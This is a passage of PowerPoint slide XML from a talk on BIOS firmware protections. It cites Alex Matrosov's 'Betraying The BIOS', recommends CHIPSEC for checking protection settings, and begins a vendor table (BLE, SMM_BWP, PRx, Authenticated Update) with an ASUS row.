                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>And even if they do, there is no guarantee they do it right</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>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F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Use CHIPSEC to get your protections configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>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9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>						</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800"/>
              <a:t> k</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="325" name="Shape 325"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6104075" y="5564773"/>
            <a:ext cx="5363100" cy="697500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>[Alex Matrosov. Betraying The BIOS. Where the Guardians Of The BIOS Are Failing]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>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9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="326" name="Shape 326"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6189914" y="1628775"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{71C194A9-4016-4AD4-BD18-990939A0B66A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1058325"/>
                <a:gridCol w="633750"/>
                <a:gridCol w="1068300"/>
                <a:gridCol w="814800"/>
                <a:gridCol w="1557200"/>
              </a:tblGrid>
              <a:tr h="471475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="77B82A"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed Light"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="77B82A"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed Light"/>
                          <a:ea typeface="Roboto Condensed Light"/>
                          <a:cs typeface="Roboto Condensed Light"/>
                          <a:sym typeface="Roboto Condensed Light"/>
                        </a:rPr>
                        <a:t>Vendor Name</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="77B82A"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed Light"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="77B82A"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed Light"/>
                          <a:ea typeface="Roboto Condensed Light"/>
                          <a:cs typeface="Roboto Condensed Light"/>
                          <a:sym typeface="Roboto Condensed Light"/>
                        </a:rPr>
                        <a:t>BLE</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="77B82A"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed Light"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="77B82A"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed Light"/>
                          <a:ea typeface="Roboto Condensed Light"/>
                          <a:cs typeface="Roboto Condensed Light"/>
                          <a:sym typeface="Roboto Condensed Light"/>
                        </a:rPr>
                        <a:t>SMM_BWP</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="77B82A"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed Light"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="77B82A"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed Light"/>
                          <a:ea typeface="Roboto Condensed Light"/>
                          <a:cs typeface="Roboto Condensed Light"/>
                          <a:sym typeface="Roboto Condensed Light"/>
                        </a:rPr>
                        <a:t>PRx</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="77B82A"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed Light"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="77B82A"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed Light"/>
                          <a:ea typeface="Roboto Condensed Light"/>
                          <a:cs typeface="Roboto Condensed Light"/>
                          <a:sym typeface="Roboto Condensed Light"/>
                        </a:rPr>
                        <a:t>Authenticated Update</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="404925">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="E63451"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1000" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="E63451"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>ASUS</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="lt1"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>+</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="lt1"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>+</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="E63451"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="E63451"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
